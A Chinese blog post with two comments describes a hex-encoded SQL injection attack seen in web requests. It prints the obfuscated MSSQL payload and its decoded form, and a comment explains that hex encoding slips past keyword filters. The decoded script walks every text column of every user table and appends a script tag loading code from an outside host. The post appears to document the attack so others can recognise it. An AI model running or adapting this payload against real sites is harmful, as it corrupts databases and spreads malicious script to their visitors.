`
zhuyx808
  • 浏览: 120537 次
  • 性别: Icon_minigender_1
  • 来自: 快来看~天上米有灰机
社区版块
存档分类
最新评论

16进制的SQL 注入

SQLCC++C#.net 
阅读更多

通过post,get,cookies方式注入,注入内容如下:

DeCLaRE @S NvArCHaR(4000);SeT @S=CaSt(0x4400650063006C0061007200650020004000540020005600610072006300680061007200280032

003500350029002C004000430020005600610072006300680061007200280032003500350029002000440065

0063006C0061007200650020005400610062006C0065005F0043007500720073006F00720020004300750072

0073006F007200200046006F0072002000530065006C00650063007400200041002E004E0061006D0065002C

0042002E004E0061006D0065002000460072006F006D0020005300790073006F0062006A0065006300740073

00200041002C0053007900730063006F006C0075006D006E0073002000420020005700680065007200650020

0041002E00490064003D0042002E0049006400200041006E006400200041002E00580074007900700065003D

00270075002700200041006E0064002000280042002E00580074007900700065003D003900390020004F00720

0200042002E00580074007900700065003D003300350020004F007200200042002E0058007400790070006500

3D0032003300310020004F007200200042002E00580074007900700065003D00310036003700290020004F007

00065006E0020005400610062006C0065005F0043007500720073006F00720020004600650074006300680020

004E006500780074002000460072006F006D00200020005400610062006C0065005F0043007500720073006F0

07200200049006E0074006F002000400054002C004000430020005700680069006C0065002800400040004600

65007400630068005F005300740061007400750073003D0030002900200042006500670069006E002000450078

00650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200053006500

740020005B0027002B00400043002B0027005D003D0052007400720069006D00280043006F006E00760065007

2007400280056006100720063006800610072002800380030003000300029002C005B0027002B00400043002B0

027005D00290029002B00270027003C0073006300720069007000740020007300720063003D006800740074007

0003A002F002F007A003300360030002E006E00650074003E003C002F007300630072006900700074003E00270

02700270029004600650074006300680020004E006500780074002000460072006F006D00200020005400610062

006C0065005F0043007500720073006F007200200049006E0074006F002000400054002C004000430020004500

6E006400200043006C006F007300650020005400610062006C0065005F0043007500720073006F007200200044

00650061006C006C006F00630061007400650020005400610062006C0065005F0043007500720073006F007200 aS NvArChAR(4000));ExEc(@S);--;



在查询分析器里转换的sql语句如下:


Declare @T Varchar(255),@C Varchar(255)
Declare Table_Cursor Cursor For Select A.Name,B.Name From Sysobjects A,Syscolumns B Where A.Id=B.Id And A.Xtype='u' And (B.Xtype=99 Or B.Xtype=35 Or B.Xtype=231 Or B.Xtype=167)

Open Table_Cursor

    Fetch Next From  Table_Cursor  Into @T,@C
  
    While(@@Fetch_Status=0)
    Begin
        Exec('update ['+@T+'] Set ['+@C+']=Rtrim(Convert(Varchar(8000),['+@C+']))+''<script src=http://z360.net></script>''')Fetch Next From  Table_Cursor Into @T,@C
    End
Close Table_Cursor

Deallocate Table_Cursor

 

分享到:
| 懒惰阿懒惰
评论
2 楼 zhuyx808 2011-02-10  
其实上面一段代码本身就是一个sql语句,为了绕过明文(select update delete)的限制,他们就把代码转换为16进制,而exec可以执行这个语句。你只需要在exec前加上print @s 就可以看到这个语句了
1 楼 iwlk 2011-01-08  
不知在“查询分析器里转换”中如何转换的? 我没有找到~ 忘指点一二~
发表评论

您还没有登录,请您登录后再发表评论

相关推荐

Magicbox
Global site tag (gtag.js) - Google Analytics